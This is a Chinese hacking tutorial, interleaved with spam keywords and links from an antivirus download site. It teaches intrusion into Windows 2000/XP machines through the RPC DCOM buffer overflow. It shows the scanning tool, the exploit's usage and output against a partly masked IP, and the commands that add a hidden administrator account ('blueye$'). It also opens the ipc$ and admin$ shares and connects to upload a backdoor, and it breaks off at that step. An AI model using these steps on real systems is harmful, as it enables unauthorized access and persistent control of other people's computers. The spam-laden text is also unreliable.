投递文章
投稿指南入侵工具dcomrpc
大家好,现在网上很流行dcomrpc,那好就说说利用dcomrpc入侵。很入侵之后做的事情。 http://zhisao.saodu.com
需要的工具:
很好的: radmin.exe
反流氓软件
扫描工具: retinarpcdcom.exe 反木马
溢出攻击工具:RpcDcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe 专杀工具下载
代理:sksockserver.exe
http://www.saodu.com
后门程序:WinEggDropShellPro3thVersion
反病毒
好了,该做的都做的差不多了。 反钓鱼
首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必
随便扫一下就会发现有许多主机开放的135端口)
211.217.50.xx 第一个主机就被扫出来又此漏洞。
http://www.saodu.com
看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下 反流氓软件
其他的缺陷主机开了3389端口我们可以上去看一下是xp版本还是win2k是win2k server版本展开命令行:
[查看dcomrpc的用法 用法 dcomrpc -d <host> [options] ]
反流氓软件
F:/hack>cd rpc/dcomrpc 反流氓软件
RPC DCOM Expl01t coded by .:[oc192.us]:. Security
反钓鱼
Complied and Modified by Expl01t www.longker.com
Usage: 专杀工具下载
dcomrpc -d <host> [options]
专杀工具下载
Options:
-d: Hostname to attack [Required] 反钓鱼
-t: Type [Default: 0] 反病毒
-r: Return address [Default: Selected from target]
杀毒
-p: Attack port [Default: 135]
反钓鱼
-l: Bindshell port [Default: 666] 杀毒软件下载
Types: 扫毒
0 [0x0018759f]: [Win2k-Universal]
1 [0x0100139d]: [WinXP-Universal] 杀毒软件下载
开始进行溢出: 扫毒网
F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0
扫毒网
RPC DCOM remote expl01t - .:[oc192.us]:. Security 反垃圾邮件
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host.. 反钓鱼
[ ] Done.
[ ] Expl01ting....Just wait...... 杀毒
等到出现,说明溢出成功
http://zhisao.saodu.com
c:/winnt/system32> http://www.saodu.com
接着我们建立用户 http://www.saodu.com
c:/winnt/system32>net user blueye$ 1111 /add
命令成功完成。
把用户添加成超级管理员 http://down.saodu.com
c:/winnt/system32>net localgroup administrators blueye$ /add
http://www.saodu.com
命令成功完成。
http://bbs.saodu.com
看看共享开了没有没有的话把共享开开
c:/winnt/system32>net share 专杀工具下载
清单是空的。
c:/winnt/system32>net share ipc$
杀毒软件下载
命令成功完成。 杀毒
c:/winnt/system32>net share admin$
命令成功完成。
入侵技巧
扫毒
到这里我们入侵告一段落 扫毒
[ 建 立 IPC$ 连 接 ,也可以使用tftp上传 ,先和对方建立连接] 反流氓软件
F:/hack>net use //211.217.50.xx/ipc$ "1111" /user:blueye$ 反流氓软件
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里] 扫毒
